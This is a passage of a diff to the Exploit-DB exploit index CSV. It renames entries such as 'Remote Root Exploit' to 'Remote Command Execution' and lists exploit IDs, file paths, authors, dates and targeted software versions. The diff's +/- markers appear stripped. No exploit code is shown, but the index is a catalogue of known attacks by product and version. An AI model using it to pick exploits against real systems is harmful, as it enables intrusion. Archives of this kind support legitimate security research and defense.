17448,platforms/windows/remote/17448.rb,"Lotus Notes 8.0.x < 8.5.2 FP2 - Autonomy Keyview ('.lzh' Attachment) (Metasploit)",2011-06-23,Metasploit,windows,remote,0
17460,platforms/windows/remote/17460.pl,"Kaillera - Multiple Clients Buffer Overflow Vulnerabilities",2011-06-30,Sil3nt_Dre4m,windows,remote,0
17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Root Exploit",2011-06-30,kingcope,freebsd,remote,0
17462,platforms/freebsd/remote/17462.txt,"FreeBSD OpenSSH 3.5p1 - Remote Command Execution",2011-06-30,kingcope,freebsd,remote,0
17467,platforms/windows/remote/17467.rb,"HP - OmniInet.exe Opcode 27 Buffer Overflow (Metasploit)",2011-07-01,Metasploit,windows,remote,5555
17468,platforms/windows/remote/17468.py,"HP Data Protector 6.11 - Remote Buffer Overflow (DEP Bypass)",2011-07-02,"muts and dookie",windows,remote,5555
17490,platforms/windows/remote/17490.rb,"HP OmniInet.exe Opcode 20 - Buffer Overflow (Metasploit)",2011-07-04,Metasploit,windows,remote,0
@ -11037,7 +11040,7 @@ id,file,description,date,author,platform,type,port
17635,platforms/hardware/remote/17635.rb,"HP JetDirect PJL - Interface Universal Directory Traversal (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0
17636,platforms/hardware/remote/17636.rb,"HP JetDirect PJL - Query Execution (Metasploit)",2011-08-07,"Myo Soe",hardware,remote,0
17645,platforms/hardware/remote/17645.py,"iphone/ipad phone drive 1.1.1 - Directory Traversal",2011-08-09,"Khashayar Fereidani",hardware,remote,0
17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Root Shell",2011-08-10,SZ,linux,remote,0
17648,platforms/linux/remote/17648.sh,"HP Data Protector (Linux) - Remote Command Execution",2011-08-10,SZ,linux,remote,0
17649,platforms/windows/remote/17649.py,"BisonWare BisonFTP Server 3.5 - Remote Buffer Overflow",2011-08-10,localh0t,windows,remote,0
17650,platforms/windows/remote/17650.rb,"Mozilla Firefox 3.6.16 - mChannel Use-After-Free (Metasploit) (1)",2011-08-10,Metasploit,windows,remote,0
17656,platforms/windows/remote/17656.rb,"TeeChart Professional ActiveX Control 2010.0.0.3 - Trusted Integer Dereference (Metasploit)",2011-08-11,Metasploit,windows,remote,0
@ -11093,7 +11096,7 @@ id,file,description,date,author,platform,type,port
18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine - Remote Code Execution (Metasploit)",2011-11-30,Metasploit,multiple,remote,0
18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution (Metasploit)",2011-11-30,Metasploit,hardware,remote,0
18179,platforms/jsp/remote/18179.html,"IBM Lotus Domino Server Controller - Authentication Bypass",2011-11-30,"Alexey Sintsov",jsp,remote,0
18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit",2011-12-01,kingcope,freebsd,remote,0
18181,platforms/freebsd/remote/18181.txt,"FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution",2011-12-01,kingcope,freebsd,remote,0
18182,platforms/windows/remote/18182.txt,"Serv-U FTP Server - Jail Break",2011-12-01,kingcope,windows,remote,0
18183,platforms/windows/remote/18183.rb,"AVID Media Composer Phonetic Indexer - Remote Stack Buffer Overflow (Metasploit)",2011-12-01,"Nick Freeman",windows,remote,0
18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0
@ -11157,7 +11160,7 @@ id,file,description,date,author,platform,type,port
18623,platforms/windows/remote/18623.txt,"LANDesk Lenovo ThinkManagement Suite 9.0.3 Core Server - Arbitrary File Deletion",2012-03-19,rgod,windows,remote,0
18624,platforms/windows/remote/18624.txt,"2X Client for RDP 10.1.1204 - ClientSystem Class ActiveX Control Download and Execute",2012-03-19,rgod,windows,remote,0
18625,platforms/windows/remote/18625.txt,"2X ApplicationServer 10.1 - TuxSystem Class ActiveX Control Remote File Overwrite",2012-03-19,rgod,windows,remote,0
18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Root Remote Code Execution)",2012-05-26,muts,linux,remote,0
18932,platforms/linux/remote/18932.py,"Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Remote Code Execution)",2012-05-26,muts,linux,remote,0
18634,platforms/windows/remote/18634.rb,"Dell Webcam CrazyTalk - ActiveX BackImage (Metasploit)",2012-03-21,Metasploit,windows,remote,0
18640,platforms/windows/remote/18640.txt,"Google Talk - 'gtalk://' Deprecated URI Handler Parameter Injection",2012-03-22,rgod,windows,remote,0
18642,platforms/windows/remote/18642.rb,"Microsoft Internet Explorer - Object Memory Use-After-Free (MS10-002) (Metasploit)",2012-03-22,Metasploit,windows,remote,0
@ -11338,7 +11341,7 @@ id,file,description,date,author,platform,type,port
19507,platforms/solaris/remote/19507.txt,"Solaris 7.0 - Recursive mutex_enter Panic",1999-09-23,"David Brumley",solaris,remote,0
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4 (Windows 95/Windows NT 4) - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Root Exploit (2)",2012-07-01,kingcope,bsd,remote,0
19520,platforms/bsd/remote/19520.txt,"BSD TelnetD - Remote Command Execution (2)",2012-07-01,kingcope,bsd,remote,0
19521,platforms/windows/remote/19521.txt,"Microsoft Internet Explorer 5.0/4.0.1 - hhopen OLE Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19522,platforms/linux/remote/19522.txt,"Linux Kernel 2.2 - Predictable TCP Initial Sequence Number",1999-09-27,"Stealth and S. Krahmer",linux,remote,0
19530,platforms/windows/remote/19530.txt,"Microsoft Internet Explorer 5 - Download Behaviour",1999-09-27,"Georgi Guninski",windows,remote,0
@ -11543,7 +11546,7 @@ id,file,description,date,author,platform,type,port
20059,platforms/cgi/remote/20059.txt,"CGI-World Poll It 2.0 - Internal Variable Override",2000-07-04,"Adrian Daminato",cgi,remote,0
20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 - '/INVITE' Format String",2000-07-05,RaiSe,linux,remote,0
20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 - Remote Buffer Overflow",2000-07-02,UNYUN,linux,remote,0
20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution)",2012-07-24,muts,linux,remote,0
20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Remote Command Execution)",2012-07-24,muts,linux,remote,0
20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 - File Existence Disclosure",2000-07-08,"Andrew Lewis",windows,remote,0
20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow",2000-07-03,Wizdumb,windows,remote,0
20067,platforms/hardware/remote/20067.c,"PIX Firewall 2.7/3.x/4.x/5 - Forged TCP RST",2000-07-10,"Citec Network Securities",hardware,remote,0
@ -11786,7 +11789,7 @@ id,file,description,date,author,platform,type,port
20594,platforms/unix/remote/20594.txt,"WU-FTPD 2.4.2/2.5/2.6 - Debug Mode Client Hostname Format String",2001-01-23,"Wu-ftpd team",unix,remote,0
20595,platforms/multiple/remote/20595.txt,"NCSA 1.3/1.4.x/1.5 / Apache httpd 0.8.11/0.8.14 - ScriptAlias Source Retrieval",1999-09-25,anonymous,multiple,remote,0
20597,platforms/linux/remote/20597.txt,"Majordomo 1.89/1.90 - lists Command Execution",1994-06-06,"Razvan Dragomirescu",linux,remote,0
20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Root Exploit",1994-02-24,CIAC,unix,remote,0
20599,platforms/unix/remote/20599.sh,"Sendmail 8.6.9 IDENT - Remote Command Execution",1994-02-24,CIAC,unix,remote,0
20600,platforms/windows/remote/20600.c,"SmartMax MailMax 1.0 - SMTP Buffer Overflow",1999-02-13,_mcp_,windows,remote,0
20601,platforms/multiple/remote/20601.txt,"iweb hyperseek 2000 - Directory Traversal",2001-01-28,"MC GaN",multiple,remote,0
20602,platforms/solaris/remote/20602.c,"Solaris x86 2.4/2.5 - nlps_server Buffer Overflow",1998-04-01,"Last Stage of Delirium",solaris,remote,0
@ -12073,7 +12076,7 @@ id,file,description,date,author,platform,type,port
21264,platforms/php/remote/21264.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (1)",2002-02-03,"Dave Wilson",php,remote,0
21265,platforms/php/remote/21265.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (2)",2002-02-03,anonymous,php,remote,0
21266,platforms/php/remote/21266.php,"PHP 4.x/5.x MySQL Library - 'Safe_mode' Filesystem Circumvention (3)",2002-02-03,anonymous,php,remote,0
21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Shell",2012-09-12,"Mattijs van Ommeren",hardware,remote,0
21268,platforms/hardware/remote/21268.py,"Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Exploit",2012-09-12,"Mattijs van Ommeren",hardware,remote,0
21274,platforms/windows/remote/21274.c,"MIRC 2.x/3.x/4.x/5.x - Nick Buffer Overflow",2002-02-03,"James Martin",windows,remote,0
21276,platforms/multiple/remote/21276.txt,"Thunderstone TEXIS 3.0 - Full Path Disclosure",2002-02-06,phinegeek,multiple,remote,0
21285,platforms/hardware/remote/21285.txt,"HP AdvanceStack Switch - Authentication Bypass",2002-02-08,"Tamer Sahin",hardware,remote,0
@ -12354,13 +12357,13 @@ id,file,description,date,author,platform,type,port
22084,platforms/unix/remote/22084.c,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Length Account Compromise",2002-12-16,Andi,unix,remote,0
22085,platforms/unix/remote/22085.txt,"MySQL 3.23.x/4.0.x - COM_CHANGE_USER Password Memory Corruption",2002-12-12,"Stefan Esser",unix,remote,0
22091,platforms/linux/remote/22091.c,"zkfingerd SysLog 0.9.1 - Format String",2002-12-16,"Marceta Milos",linux,remote,0
22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQL Injection",2012-10-19,xistence,multiple,remote,0
22093,platforms/multiple/remote/22093.py,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection",2012-10-19,xistence,multiple,remote,0
22094,platforms/windows/remote/22094.rb,"ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM SQL Injection (Metasploit)",2012-10-19,xistence,windows,remote,0
22101,platforms/linux/remote/22101.c,"zkfingerd 0.9.1 - say() Format String",2002-12-16,"Marceta Milos",linux,remote,0
22106,platforms/linux/remote/22106.txt,"CUPS 1.1.x - Negative Length HTTP Header",2002-12-19,iDefense,linux,remote,0
22112,platforms/windows/remote/22112.txt,"PlatinumFTPServer 1.0.6 - Information Disclosure",2002-12-30,"Dennis Rand",windows,remote,0
22113,platforms/windows/remote/22113.txt,"PlatinumFTPServer 1.0.6 - Arbitrary File Deletion",2002-12-30,"Dennis Rand",windows,remote,0
22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Root Exploit",2003-01-06,"Carl Livitt",linux,remote,0
22129,platforms/linux/remote/22129.c,"H-Sphere Webshell 2.4 - Remote Command Execution",2003-01-06,"Carl Livitt",linux,remote,0
22130,platforms/multiple/remote/22130.txt,"AN HTTPD 1.41 e - Cross-Site Scripting",2003-01-06,D4rkGr3y,multiple,remote,0
22131,platforms/bsd/remote/22131.pl,"Linux Kernel 2.0.x/2.2.x/2.4.x (FreeBSD 4.x) - Network Device Driver Frame Padding Information Disclosure",2007-03-23,"Jon Hart",bsd,remote,0
22135,platforms/linux/remote/22135.c,"TANne 0.6.17 - Session Manager SysLog Format String",2003-01-07,"dong-h0un yoU",linux,remote,0
@ -12602,7 +12605,7 @@ id,file,description,date,author,platform,type,port
23069,platforms/multiple/remote/23069.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Information Disclosure",2003-08-30,"Martin Eiszner",multiple,remote,0
23070,platforms/multiple/remote/23070.txt,"sap internet transaction server 4620.2.0.323011 build 46b.323011 - Directory Traversal",2003-08-30,"Martin Eiszner",multiple,remote,0
23071,platforms/multiple/remote/23071.txt,"SAP Internet Transaction Server 4620.2.0.323011 Build 46B.323011 - Cross-Site Scripting",2003-08-30,"Martin Eiszner",multiple,remote,0
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit",2012-12-02,kingcope,windows,remote,0
23073,platforms/windows/remote/23073.txt,"MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution",2012-12-02,kingcope,windows,remote,0
23074,platforms/windows/remote/23074.txt,"IBM System Director Agent - Remote System Level Exploit",2012-12-02,kingcope,windows,remote,0
23079,platforms/windows/remote/23079.txt,"freeFTPd - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
23080,platforms/windows/remote/23080.txt,"freeSSHd 2.1.3 - Remote Authentication Bypass",2012-12-02,kingcope,windows,remote,0
@ -12810,7 +12813,7 @@ id,file,description,date,author,platform,type,port
23732,platforms/windows/remote/23732.c,"PSOProxy 0.91 - Remote Buffer Overflow (1)",2004-02-20,PaLbOsA,windows,remote,0
23733,platforms/windows/remote/23733.c,"PSOProxy 0.91 - Remote Buffer Overflow (2)",2004-02-20,Li0n7,windows,remote,0
23734,platforms/windows/remote/23734.c,"PSOProxy 0.91 - Remote Buffer Overflow (3)",2004-02-20,NoRpiuS,windows,remote,0
23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution",2012-12-29,xistence,hardware,remote,0
23735,platforms/hardware/remote/23735.py,"Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution",2012-12-29,xistence,hardware,remote,0
23736,platforms/windows/remote/23736.rb,"IBM Lotus iNotes dwa85W - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0
23737,platforms/windows/remote/23737.rb,"IBM Lotus QuickR qp2 - ActiveX Buffer Overflow (Metasploit)",2012-12-31,Metasploit,windows,remote,0
23741,platforms/windows/remote/23741.c,"Proxy-Pro Professional GateKeeper 4.7 Web Proxy - Buffer Overrun",2004-02-23,kralor,windows,remote,0
@ -12841,7 +12844,7 @@ id,file,description,date,author,platform,type,port
23837,platforms/windows/remote/23837.txt,"IBM Lotus Domino 6.5.1 - HTTP webadmin.nsf Quick Console Cross-Site Scripting",2004-03-17,dr_insane,windows,remote,0
23847,platforms/windows/remote/23847.c,"Internet Security Systems Protocol Analysis Module ICQ - Parsing Buffer Overflow",2004-03-26,Sam,windows,remote,0
23848,platforms/linux/remote/23848.txt,"SquidGuard 1.x - NULL URL Character Unauthorized Access",2004-03-19,"Petko Popadiyski",linux,remote,0
23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access",2013-01-03,dun,hardware,remote,0
23855,platforms/hardware/remote/23855.txt,"Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution",2013-01-03,dun,hardware,remote,0
23856,platforms/php/remote/23856.rb,"WordPress Plugin Advanced Custom Fields - Remote File Inclusion (Metasploit)",2013-01-03,Metasploit,php,remote,0
23864,platforms/linux/remote/23864.txt,"xweb 1.0 - Directory Traversal",2004-03-22,"Donato Ferrante",linux,remote,0
23871,platforms/windows/remote/23871.txt,"Centrinity FirstClass HTTP Server 5/7 - TargetName Parameter Cross-Site Scripting",2004-03-22,"Richard Maudsley",windows,remote,0
@ -12918,7 +12921,7 @@ id,file,description,date,author,platform,type,port
24174,platforms/windows/remote/24174.txt,"Microsoft Internet Explorer 6 - URL Local Resource Access",2004-06-06,"Rafel Ivgi The-Insider",windows,remote,0
24179,platforms/linux/remote/24179.txt,"Roundup 0.5/0.6 - Remote File Disclosure",2004-06-08,"Vickenty Fesunov",linux,remote,0
24196,platforms/windows/remote/24196.txt,"Mozilla Browser 1.6/1.7 - URI Obfuscation",2004-06-14,http-equiv,windows,remote,0
24205,platforms/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Root Exploit",2013-01-18,"Gary Nilson",linux,remote,0
24205,platforms/linux/remote/24205.txt,"Novell NCP - Unauthenticated Remote Command Execution",2013-01-18,"Gary Nilson",linux,remote,0
24230,platforms/hardware/remote/24230.txt,"BT Voyager 2000 Wireless ADSL Router - SNMP Community String Information Disclosure",2004-06-22,"Konstantin V. Gavrilenko",hardware,remote,0
24206,platforms/multiple/remote/24206.rb,"Jenkins CI Script Console - Command Execution (Metasploit)",2013-01-18,"Spencer McIntyre",multiple,remote,0
24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 - Wildcard DNS Cross-Site Scripting",2004-06-15,"bitlance winter",windows,remote,0
@ -13305,7 +13308,7 @@ id,file,description,date,author,platform,type,port
26374,platforms/windows/remote/26374.txt,"Xerver 4.17 - Single Dot File Request Source Disclosure",2005-10-19,"Ziv Kamir",windows,remote,0
26375,platforms/windows/remote/26375.txt,"Xerver 4.17 - Forced Directory Listing",2005-10-19,"Ziv Kamir",windows,remote,0
26376,platforms/windows/remote/26376.txt,"Xerver 4.17 Server - URI Null Character Cross-Site Scripting",2005-10-19,"Ziv Kamir",windows,remote,0
26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Root Exploit",2013-06-24,"Todor Donev",hardware,remote,0
26412,platforms/hardware/remote/26412.pl,"Seowonintech Devices - Remote Command Execution",2013-06-24,"Todor Donev",hardware,remote,0
26419,platforms/linux/remote/26419.rb,"ZPanel 10.0.0.2 htpasswd Module - 'Username' Command Execution (Metasploit)",2013-06-24,Metasploit,linux,remote,0
26420,platforms/windows/remote/26420.rb,"HP System Management Homepage - JustGetSNMPQueue Command Injection (Metasploit)",2013-06-24,Metasploit,windows,remote,2381
26421,platforms/php/remote/26421.rb,"LibrettoCMS File Manager - Arbitrary File Upload (Metasploit)",2013-06-24,Metasploit,php,remote,0
@ -13348,7 +13351,7 @@ id,file,description,date,author,platform,type,port
27073,platforms/windows/remote/27073.txt,"Microsoft Visual Studio - UserControl Remote Code Execution (2)",2006-01-12,priestmaster,windows,remote,0
27095,platforms/multiple/remote/27095.txt,"Apache Tomcat / Geronimo 1.0 - Sample Script cal2.jsp time Parameter Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0
27096,platforms/multiple/remote/27096.txt,"Apache Geronimo 1.0 - Error Page Cross-Site Scripting",2006-01-16,"Oliver Karow",multiple,remote,0
27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - acsd Parameter Remote Root Shell",2013-07-27,"Jacob Holcomb",linux_mips,remote,0
27133,platforms/linux_mips/remote/27133.py,"ASUS RT-AC66U - 'acsd' Parameter Remote Command Execution",2013-07-27,"Jacob Holcomb",linux_mips,remote,0
27135,platforms/multiple/remote/27135.rb,"Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution (Metasploit)",2013-07-27,Metasploit,multiple,remote,8080
27150,platforms/linux/remote/27150.txt,"Mozilla Firefox 1.0/1.5 XBL - MOZ-BINDING Property Cross-Domain Scripting",2006-01-30,"Chris Thomas",linux,remote,0
27181,platforms/multiple/remote/27181.txt,"IBM Lotus Domino 6.x/7.0 - iNotes JavaScript: Filter Bypass",2006-02-10,"Jakob Balle",multiple,remote,0
@ -13802,7 +13805,7 @@ id,file,description,date,author,platform,type,port
31023,platforms/windows/remote/31023.html,"Qvod Player 2.1.5 - 'QvodInsert.dll' ActiveX Control Remote Buffer Overflow",2008-01-11,anonymous,windows,remote,0
31031,platforms/hardware/remote/31031.txt,"8E6 R3000 Internet Filter 2.0.5.33 - URI SecURIty Bypass",2008-01-16,nnposter,hardware,remote,0
31032,platforms/windows/remote/31032.txt,"BitTorrent 6.0 / uTorrent 1.6/1.7 - Peers Window Remote Code Execution",2008-01-16,"Luigi Auriemma",windows,remote,0
31033,platforms/hardware/remote/31033.py,"ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,remote,80
31033,platforms/hardware/remote/31033.py,"ASUS RT-N56U - Remote Buffer Overflow (ROP)",2014-01-19,"Jacob Holcomb",hardware,remote,80
31039,platforms/windows/remote/31039.txt,"BitDefender Products - Update Server HTTP Daemon Directory Traversal",2008-01-19,"Oliver Karow",windows,remote,0
31040,platforms/windows/remote/31040.html,"Toshiba Surveillance Surveillix DVR 'MeIpCamX.dll' 1.0 - ActiveX Control Buffer Overflow",2008-01-20,rgod,windows,remote,0
31046,platforms/windows/remote/31046.cpp,"GlobalLink 'GLChat.ocx' 2.5.1 - ActiveX Control 'ChatRoom()' Buffer Overflow",2008-01-09,Knell,windows,remote,0
@ -14261,7 +14264,7 @@ id,file,description,date,author,platform,type,port
33869,platforms/hardware/remote/33869.txt,"Huawei EchoLife HG520 3.10.18.5-1.0.5.0 - Remote Information Disclosure",2010-04-22,hkm,hardware,remote,0
33871,platforms/multiple/remote/33871.txt,"Tiny Java Web Server 1.71 - Multiple Input Validation Vulnerabilities",2010-04-08,cp77fk4r,multiple,remote,0
33873,platforms/multiple/remote/33873.txt,"HP System Management Homepage - 'RedirectUrl' Parameter URI redirection",2010-04-25,"Aung Khant",multiple,remote,0
33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Root Exploit",2007-09-25,mu-b,multiple,remote,0
33877,platforms/multiple/remote/33877.c,"NovaSTOR NovaNET 12.0 - Remote Command Execution",2007-09-25,mu-b,multiple,remote,0
33878,platforms/multiple/remote/33878.c,"NovaSTOR NovaNET 12.0 - Remote SYSTEM Exploit",2007-09-25,mu-b,multiple,remote,0
33890,platforms/windows/remote/33890.txt,"OneHTTPD 0.6 - Directory Traversal",2010-04-27,"John Leitch",windows,remote,0
33891,platforms/java/remote/33891.rb,"HP AutoPass License Server - Arbitrary File Upload (Metasploit)",2014-06-27,Metasploit,java,remote,5814
@ -14353,7 +14356,7 @@ id,file,description,date,author,platform,type,port
34523,platforms/multiple/remote/34523.txt,"Nagios XI - 'users.php' SQL Injection",2010-08-24,"Adam Baldwin",multiple,remote,0
34532,platforms/windows/remote/34532.c,"Bloodshed Dev-C++ 4.9.9.2 - Multiple EXE Loading Arbitrary Code Execution",2010-08-25,storm,windows,remote,0
34542,platforms/windows/remote/34542.c,"UltraVNC 1.0.8.2 - DLL Loading Arbitrary Code Execution",2010-08-30,"Ivan Markovic",windows,remote,0
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Root Code Execution",2014-09-09,eF,linux,remote,80
34595,platforms/linux/remote/34595.py,"ALCASAR 2.8 - Remote Code Execution",2014-09-09,eF,linux,remote,80
34621,platforms/unix/remote/34621.c,"Mozilla Firefox 3.6.8 - 'Math.random()' Cross Domain Information Disclosure",2010-09-14,"Amit Klein",unix,remote,0
34622,platforms/windows/remote/34622.txt,"Axigen Webmail 1.0.1 - Directory Traversal",2010-09-15,"Bogdan Calin",windows,remote,0
34647,platforms/windows/remote/34647.txt,"Ammyy Admin 3.5 - Remote Code Execution (Metasploit)",2014-09-13,scriptjunkie,windows,remote,0
@ -14404,7 +14407,7 @@ id,file,description,date,author,platform,type,port
34900,platforms/linux/remote/34900.py,"Apache mod_cgi - Remote Exploit (Shellshock)",2014-10-06,"Federico Galatolo",linux,remote,0
34925,platforms/php/remote/34925.rb,"WordPress Plugin InfusionSoft - Arbitrary File Upload (Metasploit)",2014-10-09,Metasploit,php,remote,80
34926,platforms/windows/remote/34926.rb,"Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,windows,remote,80
34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Root Command Execution (Metasploit)",2014-10-09,Metasploit,unix,remote,443
34927,platforms/unix/remote/34927.rb,"F5 iControl - Remote Command Execution (Metasploit)",2014-10-09,Metasploit,unix,remote,443
34931,platforms/windows/remote/34931.c,"Microsoft Windows Vista - 'lpksetup.exe' 'oci.dll' DLL Loading Arbitrary Code Execution",2010-10-25,"Tyler Borland",windows,remote,0
34932,platforms/linux/remote/34932.html,"NitroView ESM - 'ess.pm' Remote Command Execution",2010-10-26,s_n,linux,remote,0
34943,platforms/windows/remote/34943.txt,"Project Jug 1.0.0 - Directory Traversal",2010-11-01,"John Leitch",windows,remote,0
@ -14677,7 +14680,7 @@ id,file,description,date,author,platform,type,port
36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling (Metasploit)",2015-04-08,Metasploit,windows,remote,0
36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0
36681,platforms/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0
36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)",2015-04-09,xort,linux,remote,8000
36690,platforms/linux/remote/36690.rb,"Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)",2015-04-09,xort,linux,remote,8000
36742,platforms/linux/remote/36742.txt,"ProFTPd 1.3.5 - File Copy",2015-04-13,anonymous,linux,remote,0
36744,platforms/windows/remote/36744.rb,"Adobe Flash Player - casi32 Integer Overflow (Metasploit)",2015-04-13,Metasploit,windows,remote,0
36756,platforms/windows/remote/36756.html,"Samsung iPOLiS - ReadConfigValue Remote Code Execution",2015-04-14,"Praveen Darshanam",windows,remote,0
@ -14725,7 +14728,7 @@ id,file,description,date,author,platform,type,port
37163,platforms/windows/remote/37163.py,"IBM Security AppScan Standard 9.0.2 - OLE Automation Array Remote Code Execution",2015-06-01,"Naser Farhadi",windows,remote,0
37165,platforms/windows/remote/37165.py,"WebDrive 12.2 (Build #4172) - Buffer Overflow (PoC)",2015-06-01,metacom,windows,remote,0
37171,platforms/hardware/remote/37171.rb,"D-Link Devices - HNAP SOAPAction-Header Command Execution (Metasploit)",2015-06-01,Metasploit,hardware,remote,0
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Root Exploit",2015-06-03,"Jeremy Brown",hardware,remote,0
37184,platforms/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",hardware,remote,0
37198,platforms/multiple/remote/37198.rb,"JDownloader 2 Beta - Directory Traversal",2015-06-04,PizzaHatHacker,multiple,remote,0
37262,platforms/linux/remote/37262.rb,"ProFTPd 1.3.5 - 'Mod_Copy' Command Execution (Metasploit)",2015-06-10,Metasploit,linux,remote,0
37336,platforms/multiple/remote/37336.txt,"CUPS < 2.0.3 - Multiple Vulnerabilities",2015-06-22,"Google Security Research",multiple,remote,0
@ -14981,7 +14984,7 @@ id,file,description,date,author,platform,type,port
39328,platforms/android/remote/39328.rb,"Android ADB Debug Server - Remote Payload Execution (Metasploit)",2016-01-26,Metasploit,android,remote,5555
39437,platforms/hardware/remote/39437.rb,"D-Link DCS-930L - Authenticated Remote Command Execution (Metasploit)",2016-02-10,Metasploit,hardware,remote,0
39439,platforms/jsp/remote/39439.txt,"File Replication Pro 7.2.0 - Multiple Vulnerabilities",2016-02-11,"Vantage Point Security",jsp,remote,0
39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit",2016-02-26,Sysdream,linux,remote,0
39499,platforms/linux/remote/39499.txt,"Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution",2016-02-26,Sysdream,linux,remote,0
39514,platforms/php/remote/39514.rb,"ATutor 2.2.1 - SQL Injection / Remote Code Execution (Metasploit)",2016-03-01,Metasploit,php,remote,80
39515,platforms/windows/remote/39515.rb,"Netgear ProSafe Network Management System NMS300 - Arbitrary File Upload (Metasploit)",2016-03-01,Metasploit,windows,remote,8080
39522,platforms/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",hardware,remote,0
@ -15042,11 +15045,11 @@ id,file,description,date,author,platform,type,port
40144,platforms/php/remote/40144.php,"Drupal Module Coder < 7.x-1.3 / 7.x-2.6 - Remote Code Execution (SA-CONTRIB-2016-039)",2016-07-23,Raz0r,php,remote,0
40146,platforms/linux/remote/40146.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
40147,platforms/linux/remote/40147.rb,"Barracuda Spam & Virus Firewall 5.1.3.007 - Remote Command Execution (Metasploit)",2016-07-25,xort,linux,remote,8000
40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)",2016-07-26,xort,linux,remote,8000
40162,platforms/linux/remote/40162.rb,"Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)",2016-07-26,xort,linux,remote,8000
40167,platforms/linux/remote/40167.txt,"Iris ID IrisAccess iCAM4000/iCAM7000 - Hard-Coded Credentials Remote Shell Access",2016-07-26,LiquidWorm,linux,remote,23
